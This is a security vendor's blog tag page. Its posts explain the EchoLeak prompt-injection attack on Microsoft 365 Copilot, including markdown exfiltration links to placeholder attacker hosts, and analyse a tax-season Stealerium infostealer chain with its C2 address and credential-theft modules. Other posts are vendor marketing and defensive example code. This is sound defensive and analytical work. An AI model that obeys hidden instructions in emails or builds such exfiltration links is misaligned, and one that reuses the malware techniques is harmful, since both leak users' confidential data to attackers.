Tag: Threat

  • The Silent AI Threat Hacking Microsoft 365 Copilot



    Introduction:

    What if your AI assistant wasn’t just helping you – but quietly helping someone else too?

    A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

    Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

    Vulnerability Overview:

    In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

    Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

    Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

    One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.

    EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Flow:

    From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click. Let’s walk through the chain step by step.

    1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI assisted processing. To conceal the injected instruction, the attacker uses various stealth techniques, such as: HTML comments.
    2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document—or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks—Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set. As a result, the AI executes the hidden commands. At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task—thereby enabling the next stage of the attack: leakage of sensitive internal context.
    3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:

    [Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

    To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.

    4. Link Creation to Attacker-Controlled Server: The markdown hyperlink generated by Copilot—under the influence of the injected prompt—points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}

    These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.

    5. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information—such as authentication tokens, conversation snippets, or internal documentation—without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.

    Mitigation Steps:

    To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.

    1. Prompt Isolation

    One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.

    2. Input Sanitization and Validation

    All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style="display:none;">, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.

    3. Disable Auto-Rendering of Untrusted Content

    A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.

    4. Context Access Restriction

    Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.

    5. AI Output Monitoring and Logging

    Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.

    6. User Training and Awareness

    Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

    Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.
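    As an added, defender-side illustration of mitigation steps 2, 3 and 5 (input sanitization, not auto-rendering untrusted links, and output monitoring), here is example code written for this page; it is not code from the original post, from Aim Security, or from Microsoft. It assumes a constructed allow-list of trusted link destinations (`TRUSTED_DOMAINS`) and uses constructed sample content; the regular expressions cover the carriers named above (HTML comments, display:none blocks, zero-width characters) and both inline and reference-style markdown links.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse, parse_qs

# Constructed allow-list for this example: hosts the tenant legitimately links to.
TRUSTED_DOMAINS = {"contoso.sharepoint.com", "teams.microsoft.com"}

# Carriers of hidden instructions named in the mitigation steps.
HTML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)
HIDDEN_BLOCK = re.compile(
    r"<([a-z]+)[^>]*style\s*=\s*[\"']?[^\"'>]*display\s*:\s*none[^>]*>.*?</\1>",
    re.DOTALL | re.IGNORECASE,
)
ZERO_WIDTH = re.compile(r"[\u200b\u200c\u200d\u2060\ufeff]")

# Markdown link forms: inline [text](url) / ![alt](url) and reference definitions [ref]: url
MD_INLINE = re.compile(r"!?\[[^\]]*\]\(([^)\s]+)[^)]*\)")
MD_REFERENCE = re.compile(r"^[ \t]*\[[^\]]+\]:[ \t]*(\S+)", re.MULTILINE)
SENSITIVE_PARAM = re.compile(r"token|secret|password|pwd|auth|bearer|session", re.IGNORECASE)


def sanitize_untrusted_input(text: str) -> str:
    """Remove hidden-instruction carriers from inbound content before the model sees it."""
    text = HTML_COMMENT.sub("", text)
    text = HIDDEN_BLOCK.sub("", text)
    return ZERO_WIDTH.sub("", text)


@dataclass
class Finding:
    url: str
    reason: str


def extract_urls(text: str) -> list[str]:
    """Collect every link destination the assistant output would render."""
    return MD_INLINE.findall(text) + MD_REFERENCE.findall(text)


def scan_ai_output(text: str) -> list[Finding]:
    """Flag links in assistant output that could carry context data off-tenant."""
    findings = []
    for url in extract_urls(text):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host not in TRUSTED_DOMAINS:
            findings.append(Finding(url, "destination not on the allow-list"))
            if parsed.query:
                findings.append(Finding(url, "query string sent to an untrusted destination"))
        for name, values in parse_qs(parsed.query).items():
            # Parameter names that smell like credentials, or values long enough to be tokens.
            if SENSITIVE_PARAM.search(name) or any(len(v) > 40 for v in values):
                findings.append(Finding(url, f"sensitive-looking parameter '{name}'"))
    return findings


def neutralize_untrusted_links(text: str) -> str:
    """Rewrite links to non-allow-listed hosts so a client cannot auto-fetch or preview them."""
    def replace(match: re.Match) -> str:
        host = (urlparse(match.group(1)).hostname or "").lower()
        return match.group(0) if host in TRUSTED_DOMAINS else "[link removed: untrusted destination]"
    text = MD_INLINE.sub(replace, text)
    return MD_REFERENCE.sub(replace, text)


if __name__ == "__main__":
    # Constructed sample assistant output with one exfiltration-style link and one legitimate link.
    sample = ("Summary ready. [Click here for more info](https://attacker.example/exfiltrate?token={{internal_token}})\n"
              "Source: [report](https://contoso.sharepoint.com/sites/fin/q2.docx)")
    for finding in scan_ai_output(sample):
        print(f"ALERT {finding.reason}: {finding.url}")
    print(neutralize_untrusted_links(sample))
```

    The scanner runs on the assistant's output, the sanitizer on inbound content; both are cheap enough to sit inline in a mail-processing or logging pipeline, and the findings give the monitoring described in step 5 something concrete to alert on.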

    References:

    https://www.aim.security/lp/aim-labs-echoleak-blogpost

    Author:

    Nandini Seth

    Adrip Mukherjee




  • Why Threat Intelligence is the Missing Link in Your Cybersecurity Strategy



    In the ever-evolving landscape of cyber threats, organizations are no longer asking if they’ll be targeted but when. Traditional cybersecurity measures, such as firewalls, antivirus software, and access control, remain essential. But they’re often reactive, responding only after a threat has emerged. In contrast, threat intelligence enables organizations to get ahead of the curve by proactively identifying and preparing for risks before they strike.

    What is Threat Intelligence?

    At its core, threat intelligence is the process of gathering, analyzing, and applying information about existing and potential attacks. This includes data on threat actors, tactics and techniques, malware variants, phishing infrastructure, and known vulnerabilities.

    The value of threat intelligence lies not just in raw data, but in its context—how relevant it is to your environment, and how quickly you can act on it.

    Why Organizations Need Threat Intelligence

    1. Cyber Threats Are Evolving Rapidly

    New ransomware variants, phishing techniques, and zero-day vulnerabilities emerge daily. Threat intelligence helps organizations stay informed about these developments in real time, allowing them to adjust their defenses accordingly.

    2. Contextual Awareness Improves Response

    When a security event occurs, knowing whether it’s a one-off anomaly or part of a broader attack campaign is crucial. Threat intelligence provides this clarity, helping teams prioritize incidents that pose real risk over false alarms.

    3. It Powers Proactive Defense

    With actionable intelligence, organizations can proactively patch vulnerabilities, block malicious domains, and tighten controls on specific threat vectors—preventing breaches before they occur.

    4. Supports Compliance and Risk Management

    Many data protection regulations require businesses to demonstrate risk-based security practices. Threat intelligence can support compliance with frameworks like ISO 27001, GDPR, and India’s DPDP Act by providing documented risk assessments and preventive actions.

    5. Essential for Incident Detection and Response

    Modern SIEMs, SOAR platforms, and XDR solutions rely heavily on enriched threat feeds to detect threats early and respond faster. Without real-time intelligence, these systems are less effective and may overlook critical indicators of compromise.

    Types of Threat Intelligence

    • Strategic Intelligence: High-level trends and risks to inform business decisions.
    • Tactical Intelligence: Insights into attacker tools, techniques, and procedures (TTPs).
    • Operational Intelligence: Real-time data on active threats, attack infrastructure, and malware campaigns.
    • Technical Intelligence: Specific IOCs (indicators of compromise) like IP addresses, hashes, or malicious URLs.

    Each type plays a unique role in creating a layered defense posture.

    Challenges in Implementing Threat Intelligence

    Despite its benefits, threat intelligence can be overwhelming. The sheer volume of data, lack of context, and integration issues often dilute its impact. To be effective, organizations need:

    • Curated, relevant intelligence feeds
    • Automated ingestion into security tools
    • Clear mapping to business assets and risks
    • Skilled analysts to interpret and act on the data

    The Way Forward: Intelligence-Led Security

    Security teams must shift from passive monitoring to intelligence-led security operations. This means treating threat intelligence as a core input for every security decision, such as prioritizing vulnerabilities, hardening cloud environments, or responding to an incident.

    In a world where attackers collaborate, automate, and innovate, defenders need every edge. Threat intelligence provides that edge.

    Ready to Build an Intelligence-Driven Defense?

    Seqrite Threat Intelligence helps enterprises gain real-time visibility into global and India-specific emerging threats. Backed by over 10 million endpoint signals and advanced malware analysis, it’s designed to supercharge your SOC, SIEM, or XDR. Explore Seqrite Threat Intelligence to strengthen your cybersecurity strategy.




  • The Role of ZTNA in Insider Threat Mitigation



    In today’s fast-evolving threat landscape, enterprises often focus heavily on external cyberattacks, overlooking one of the most potent and damaging risks: insider threats. Whether it’s a malicious employee, a careless contractor, or a compromised user account, insider threats strike from within the perimeter, making them harder to detect, contain, and mitigate.

    As organizations become more hybrid, decentralized, and cloud-driven, moving away from implicit trust is more urgent than ever. Zero Trust Network Access (ZTNA) is emerging as a critical solution, silently transforming how businesses do insider threat mitigation.

    Understanding the Insider Threat Landscape

    Insider threats are not always malicious. They can stem from:

    • Disgruntled or rogue employees intentionally leaking data
    • Well-meaning staff misconfiguring systems or falling for phishing emails
    • Contractors or third-party vendors with excessive access
    • Compromised user credentials obtained via social engineering

    According to multiple cybersecurity studies, insider incidents now account for over 30% of all breaches, and their average cost rises yearly.

    The real challenge? Traditional security models operate on implicit trust. Once inside the network, users often have wide, unchecked access, which creates fertile ground for lateral movement, privilege abuse, and data exfiltration.

    ZTNA in Action: Redefining Trust, Access, and Visibility

    Zero Trust Network Access challenges the outdated notion of “trust but verify.” Instead, it enforces “never trust, always verify”—even for users already inside the network.

    ZTNA provides access based on identity, device posture, role, and context, ensuring that every access request is continuously validated. This approach is a game-changer for insider threat mitigation.

    1. Granular Access Control

    ZTNA enforces least privilege access, meaning users only get access to the specific applications or data they need—nothing more. Even if an insider intends to exfiltrate data, their reach is limited.

    For example, a finance team member can access their accounting software, but cannot see HR or R&D files, no matter how hard they try.

    2. Micro-Segmentation for Blast Radius Reduction

    ZTNA divides the network into isolated micro-segments. This restricts lateral movement, so even if an insider compromises one segment, they cannot hop across systems undetected.

    This segmentation acts like watertight compartments in a ship, containing the damage and preventing full-scale breaches.

    3. Device and Risk Posture Awareness

    ZTNA solutions assess device health before granting access. Access can be denied or limited if an employee logs in from an outdated or jailbroken device. This becomes crucial when insider risks stem from compromised endpoints.

    4. Continuous Monitoring and Behavioral Analytics

    ZTNA enables real-time visibility into who accessed what, from where, and for how long. Any deviation from expected behavior can trigger alerts or require re-authentication. For instance:

    • A user downloading an unusually high volume of files
    • Repeated access attempts outside business hours
    • Use of shadow IT apps or unauthorized tools

    With continuous risk scoring and adaptive access, suspicious insider behavior can be curtailed before damage is done.
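    To make the four mechanisms above concrete, here is an added policy-decision example written for this page; it is not Seqrite ZTNA code or any vendor's implementation. It assumes a constructed role-to-application entitlement table (`ROLE_ENTITLEMENTS`) and example thresholds (business hours, bulk-download count, risk cut-offs) chosen for illustration, and it evaluates a request in the order a ZTNA broker would: least-privilege entitlement first, then device posture, then a continuous risk score that decides between allow, step-up authentication, and deny.

```python
from dataclasses import dataclass
from datetime import datetime

# Constructed entitlement table for this example: which apps each role may reach.
ROLE_ENTITLEMENTS = {
    "finance": {"accounting"},
    "hr": {"hris"},
    "engineering": {"source-control", "ci"},
}

# Thresholds are assumptions chosen for the example, not vendor defaults.
BUSINESS_HOURS = range(9, 18)
BULK_DOWNLOAD_THRESHOLD = 200
STEP_UP_RISK = 30
DENY_RISK = 70


@dataclass
class Device:
    managed: bool
    os_patched: bool
    jailbroken: bool


@dataclass
class AccessRequest:
    user: str
    role: str
    app: str
    device: Device
    when: datetime
    files_downloaded_last_hour: int = 0
    failed_attempts_last_hour: int = 0
    app_sanctioned: bool = True  # False models use of a shadow-IT tool


@dataclass
class Decision:
    allow: bool
    reason: str
    risk: int
    step_up: bool = False


def posture_ok(device: Device) -> bool:
    """Device health gate: unmanaged, unpatched or jailbroken devices do not get in."""
    return device.managed and device.os_patched and not device.jailbroken


def risk_score(req: AccessRequest) -> int:
    """Continuous scoring over the behavioural signals listed above."""
    score = 0
    if req.when.hour not in BUSINESS_HOURS or req.when.weekday() >= 5:
        score += 30  # access outside business hours
    if req.files_downloaded_last_hour > BULK_DOWNLOAD_THRESHOLD:
        score += 40  # unusually high download volume
    if req.failed_attempts_last_hour >= 5:
        score += 30  # repeated failed access attempts
    if not req.app_sanctioned:
        score += 40  # shadow IT / unauthorized tool
    return score


def evaluate(req: AccessRequest) -> Decision:
    # 1. Least privilege: the role must be entitled to exactly this app, nothing broader.
    if req.app not in ROLE_ENTITLEMENTS.get(req.role, set()):
        return Decision(False, f"role '{req.role}' has no entitlement to '{req.app}'", 0)
    # 2. Device posture is checked on every request, not only at login.
    if not posture_ok(req.device):
        return Decision(False, "device fails posture check", 0)
    # 3. Risk score decides between allow, re-authentication and revocation.
    risk = risk_score(req)
    if risk >= DENY_RISK:
        return Decision(False, "risk too high; access revoked pending review", risk)
    if risk >= STEP_UP_RISK:
        return Decision(True, "elevated risk; re-authentication required", risk, step_up=True)
    return Decision(True, "policy satisfied", risk)


if __name__ == "__main__":
    healthy = Device(managed=True, os_patched=True, jailbroken=False)
    late_night = datetime(2025, 6, 10, 23, 0)  # constructed timestamp (a Tuesday)
    print(evaluate(AccessRequest("alice", "finance", "hris", healthy, late_night)))
    print(evaluate(AccessRequest("bob", "engineering", "ci", healthy, late_night, files_downloaded_last_hour=500)))
```

    Because the entitlement check runs first, a finance user asking for HR data is refused before any risk scoring happens, which is the "no matter how hard they try" property described under Granular Access Control; the score then turns the behavioural signals into a step-up or a revocation rather than a log line nobody reads.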

    Real-World Relevance: Insider Threats in Indian Enterprises

    As Indian organizations ramp up their digital transformation and cloud adoption, they face new risks tied to employee churn, contractor access, and remote work culture. In addition to the growing compliance pressure from laws like the Digital Personal Data Protection (DPDP) Act, it has become clear that relying on static access controls is no longer an option.

    ZTNA’s dynamic, context-aware model perfectly fits this reality, offering a more resilient and regulation-ready access framework.

    How Seqrite ZTNA Helps with Insider Threat Mitigation

    Seqrite ZTNA is built to offer secure, identity-based access for modern Indian enterprises. It goes beyond authentication to deliver:

    • Role-based, micro-segmented access to specific apps and data
    • Granular control policies based on risk level, device posture, and location
    • Centralized visibility and detailed audit logs for every user action
    • Seamless experience for users, without the complexity of traditional solutions

    Whether you’re securing remote teams, contractors, or sensitive internal workflows, Seqrite ZTNA gives you the tools to limit, monitor, and respond to insider threats—without slowing down productivity.

    Final Thoughts

    Insider threats aren’t hypothetical—they’re already inside your network. And as organizations become more distributed, the threat surface only widens. Traditional access models offer little defense for insider threat mitigation.

    ZTNA isn’t just about external threats; it’s a silent guardian against internal risks. Enforcing continuous validation, granular access, and real-time visibility transforms your weakest points into strongholds.




  • India Cyber Threat Report Insights for Healthcare Industry



    In 2024, one industry stood out in the India Cyber Threat Report—not for its technological advancements but for its vulnerability: healthcare. According to India Cyber Threat Report 2025, the healthcare sector accounted for 21.82% of all cyberattacks, making it the most targeted industry in India.

    But why is healthcare such a lucrative target for cybercriminals?

    The Perfect Storm of Opportunity

    Healthcare organizations are in a uniquely precarious position. They house vast amounts of sensitive personal and medical data, operate mission-critical systems, and often lack mature cybersecurity infrastructure. In India, the rapid digitization of healthcare — from hospital management systems to telemedicine — has outpaced the sector’s ability to secure these new digital touchpoints.

    This creates a perfect storm: high-value data, low resilience, and high urgency. Threat actors know that healthcare providers are more likely to pay ransoms quickly to restore operations, especially when patient care is on the line.

    How Cybercriminals are Attacking

    The India Cyber Threat Report highlights a mix of attack vectors used against healthcare organizations:

    • Ransomware: Threat groups such as LockBit 3.0 and RansomHub deploy advanced ransomware strains that encrypt data and disrupt services. These strains are often delivered through phishing campaigns or unpatched vulnerabilities.
    • Trojans and Infectious Malware: Malware masquerading as legitimate software is a standard tool for gaining backdoor access to healthcare networks.
    • Social Engineering and Phishing: Fake communications from supposed government health departments or insurance providers lure healthcare staff into compromising systems.

    What Needs to Change

    The key takeaway is clear: India’s healthcare organizations need to treat cybersecurity as a core operational function, not an IT side task. Here’s how they can begin to strengthen their cyber posture:

    1. Invest in Behavior-Based Threat Detection: Traditional signature-based antivirus tools are insufficient. As seen in the rise from 12.5% to 14.5% of all malware detections, behavior-based detection is becoming critical to identifying unknown or evolving threats.
    2. Harden Endpoint Security: With 8.44 million endpoints analyzed in the report, it’s evident that endpoint defense is a frontline priority. Solutions like Seqrite Endpoint Security offer real-time protection, ransomware rollback, and web filtering tailored for sensitive environments like hospitals.
    3. Educate and Train Staff: Many successful attacks begin with a simple phishing email. Healthcare workers need regular training on identifying suspicious communications and maintaining cyber hygiene.
    4. Backup and Response Plans: Ensure regular, encrypted backups of critical systems and have an incident response plan ready to reduce downtime and mitigate damage during an attack.

    Looking Ahead

    The India Cyber Threat Report 2025 is a wake-up call. As threat actors grow more sophisticated — using generative AI for deepfake scams and exploiting cloud misconfigurations — the time for reactive cybersecurity is over.

    At Seqrite, we are committed to helping Indian enterprises build proactive, resilient, and adaptive security frameworks, especially in vital sectors like healthcare. Solutions like our Seqrite Threat Intel platform and Malware Analysis Platform (SMAP) are built to give defenders the needed edge.

    Cyber safety is not just a technical concern — it’s a human one. Let’s secure healthcare, one system at a time.

    Click to read the full India Cyber Threat Report 2025




  • Threat Actors are Targeting US Tax Season with new Tactics of Stealerium-infostealer



    Introduction

    A security researcher from Seqrite Labs has uncovered a malicious campaign targeting U.S. citizens as Tax Day approaches on April 15. Seqrite Labs has identified multiple phishing attacks leveraging tax-related themes as a vector for social engineering, aiming to exfiltrate user credentials and deploy malware. These campaigns predominantly utilize redirection techniques, such as phishing emails, and exploit malicious LNK files to further their objectives.

    Each year, cybercriminals exploit the tax season as an opportunity to deploy various social engineering tactics to compromise sensitive personal and financial data. These adversaries craft highly deceptive campaigns designed to trick taxpayers into divulging confidential information, making fraudulent payments to counterfeit services, or inadvertently installing malicious payloads on their devices, thereby exposing them to identity theft and financial loss.

    Infection Chain:

    Fig 1: Infection chain

    Initial analysis about campaign:

    While tax-season phishing attacks pose a risk to a broad spectrum of individuals, our analysis indicates that certain demographics are disproportionately vulnerable. Specifically, high-risk targets include individuals with limited knowledge of government tax processes, such as green card holders, small business owners, and new taxpayers.

    Our findings reveal that threat actors are leveraging a sophisticated phishing technique in which they deliver files via email with deceptive extensions. One such example is a file named “104842599782-4.pdf.lnk,” which utilizes a malicious LNK extension. This tactic exploits user trust by masquerading as a legitimate document, ultimately leading to the execution of malicious payloads upon interaction.

    Decoy Document:

    Threat actors are disseminating a transcript related to tax sessions, targeting individuals through email by sharing it as a malicious attachment. These cybercriminals are leveraging this document as a vector to deliver harmful payloads, thereby compromising the security of the recipients.

    Fig 2: Decoy Document

    Technical Analysis:

    We have retrieved the LNK file, identified as “04842599782-4.pdf.lnk,” which was utilized in the attack. This LNK file embeds a Base64-encoded payload within its structure.

    Fig 3: Inside LNK File

    Upon decoding the string, we extracted a PowerShell command line that itself contains another Base64-encoded payload embedded within it.

    Fig 4: Encoded PowerShell Command Line

    Subsequently, upon decoding the nested Base64 string, we uncovered the final PowerShell command line embedded within the payload.

    Fig 5: Decoded Command Line

    The extracted PowerShell command line initiated the download of rev_pf2_yas.txt, which itself is a PowerShell script (Payload.ps1) containing yet another Base64-encoded payload embedded within it.

    Fig 6: 2nd PowerShell command with Base64 Encoded

    Decoding the Base64-encoded command line above yields the final command shown below.

    Fig 7: Decoded PowerShell Command

    According to the PowerShell command line, the script Payload.ps1 (or rev_pf2_yas.txt) initiated the download of an additional file, revolaomt.rar, from the Command and Control (C2) server. This archive contained a malicious executable, named either Setup.exe or revolaomt.exe.
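    The three decoding rounds described above (LNK-embedded Base64, then a PowerShell command line carrying a second Base64 blob, then the final command) are the kind of repetitive unwrapping an analyst scripts rather than does by hand. The following triage helper is an added example written for this page, not Seqrite Labs tooling and not the campaign's real artifacts: it peels nested Base64 layers, trying UTF-16LE first because that is what PowerShell's `-EncodedCommand` expects, and pulls URLs out of every layer. The sample chain at the bottom is constructed for the demonstration, with a reserved `.invalid` hostname standing in for the real C2 and a placeholder download path.

```python
import base64
import binascii
import re
from typing import Optional

# Base64 runs long enough to be a payload rather than an identifier, plus URL-ish strings.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s'\"()<>]+")


def decode_candidate(token: str) -> Optional[str]:
    """Decode one Base64 run as text; -EncodedCommand is UTF-16LE, script bodies are UTF-8."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        # Reject decodes that "succeed" into garbage: real command lines are printable, mostly ASCII.
        printable = all(c.isprintable() or c in "\r\n\t" for c in text)
        if text and printable and sum(c.isascii() for c in text) / len(text) > 0.9:
            return text
    return None


def unwrap_layers(blob: str, max_depth: int = 8) -> list:
    """Peel nested Base64 layers, returning every stage from the raw input to the innermost text."""
    layers = [blob]
    current = blob
    for _ in range(max_depth):
        decoded = next((d for d in map(decode_candidate, B64_RUN.findall(current)) if d), None)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_urls(layers: list) -> list:
    """Collect unique URLs across all layers, in the order they are first seen."""
    seen = []
    for layer in layers:
        for url in URL.findall(layer):
            if url not in seen:
                seen.append(url)
    return seen


# --- constructed sample chain (placeholders, not the real campaign artifacts) ---
FINAL_COMMAND = ("Invoke-WebRequest -Uri 'http://c2.invalid/rev_pf2_yas.txt' "
                 "-OutFile C:\\Users\\Public\\Payload.ps1")
STAGE1_COMMAND = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
    FINAL_COMMAND.encode("utf-16-le")).decode()
SAMPLE_LNK_TEXT = ("[LNK strings: placeholder icon path, placeholder description] "
                   + base64.b64encode(STAGE1_COMMAND.encode()).decode())

if __name__ == "__main__":
    layers = unwrap_layers(SAMPLE_LNK_TEXT)
    for depth, layer in enumerate(layers):
        print(f"layer {depth}: {layer[:80]}")
    print("URLs:", extract_urls(layers))
```

    On the real sample the input would be the strings dumped from the LNK (Fig 3) and, in a second run, the contents of rev_pf2_yas.txt, which the script never fetches itself; the hostnames and paths it surfaces are what go straight into blocklists and hunting queries.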

    Detailed analysis of Setup.exe / revolaomt.exe:

    Fig 8: Detect it Easy

    Upon detailed examination of the Setup.exe binary, it was identified as a PyInstaller-packaged Python executable. Subsequent extraction and decompilation revealed embedded Python bytecode artifacts, including DCTYKS.pyc and additional Python module components.

    Fig 9: PyInstaller-packaged Python executable
    Fig 10: Inside DCTYKS.pyc

    Upon analysis of the DCTYKS.pyc sample, it was determined that the file contains obfuscated or encrypted payload data, which is programmatically decrypted at runtime and subsequently executed, as illustrated in the figure above.

    Fig 11: Encoded DCTYKS.pyc with Base64

    Upon successful decryption of the script, it was observed that the sample embeds a Base64-encoded executable payload. The decrypted payload leverages process injection techniques to target mstsc.exe for execution. Further analysis of the second-stage payload revealed it to be a .NET-compiled binary.

    Analysis of the 2nd Payload (Stealerium malware):

    Fig 12: .NET Base Malware sample

    The second-stage payload is identified as a .NET-based malware sample. Upon inspection of its class structures, methods, and overall functionality, the sample exhibits strong behavioural and structural similarities to the Stealerium malware family, specifically aligning with version 1.0.35.

    Stealerium is an open-source information-stealing malware designed to exfiltrate sensitive data from web browsers, cryptocurrency wallets, and popular applications such as Discord, Steam, and Telegram. It performs extensive system reconnaissance by harvesting details including active processes, desktop screenshots, and available Wi-Fi network configurations. Additionally, the malware incorporates sophisticated anti-analysis mechanisms to identify execution within virtualized environments and detect the presence of debugging tools.

    Anti-Analysis

    Fig 13: Anti Analysis Techniques
    Fig 14: GitHub URLs
    Fig 15: Detecting Suspicious ENV

    This AntiAnalysis class is part of malware designed to detect sandbox, virtual machines, emulators, suspicious processes, services, usernames, and more. It checks system attributes against blacklists fetched from online sources (github). If any suspicious environment is detected, it logs the finding and may trigger self-destruction. This helps the malware avoid analysis in controlled or security research setups.

    Mutex Creation

    Fig 16: Mutex Creation

    This MutexControl class prevents multiple instances of the malware from running at the same time. It tries to create a system-wide mutex using a name from Config.Mutex (QT1bm11ocWPx). If the mutex already exists, it means another instance is running, so it exits the process. If an error occurs during this check, it logs the error and exits too.

    Fig 17: Configuration of StringsCrypt.DecryptConfig

    It configures necessary values by decrypting them with StringsCrypt.DecryptConfig. It handles the decryption of the server base URL and WebSocket address. If enabled, it also decodes cryptocurrency wallet addresses from Base64 and decrypts them using AES-256 encryption.

    “hxxp://91.211.249.142:7816”

    Random Directory Creation

    Fig 18: Random Directory Creation

    The InitWorkDir() method generates a random subdirectory under %LOCALAPPDATA%, creates it if it doesn’t exist, and hides it for stealth purposes. This is likely used for storing data or maintaining persistence without detection.

    In this sample, the random directory \AppData\Local\e9d3e2dd2788c322ffd2c9defddf7728 is created with the hidden attribute set.

    Bot Registration

    Fig 19: BOT Registration

    The RegisterBot method initiates an HTTP POST request to register a bot instance, utilizing a unique hash identifier and an authorization token for authentication. It serializes the registration payload, appends the necessary HTTP headers, and logs the server response or any encountered exceptions. The method returns a boolean value—true upon successful execution, and false if an exception is raised during the process.

    RequestUri: ‘http[:]//91[.]211[.]249[.]142:7816/api/bot/v1/register’

    Stealer Activity From Browser:

    Fig 20: Stealer activity from Browser

    It extracts browser-related data (passwords, cookies, credit cards, history, bookmarks, autofill) from a given user data profile path.

    FileZilla Credentials stealer activity

    Fig 21: FileZilla Credential Stealer activity

    The above code is part of a password-stealing component targeting FileZilla, an FTP client.

    Gaming Platform Data Extraction Modules

    Fig 22: Gaming platform data extraction

    This component under bt.Stub.Target.Gaming is designed to collect data from the following platforms:

    • BattleNet
    • Minecraft
    • Steam
    • Uplay

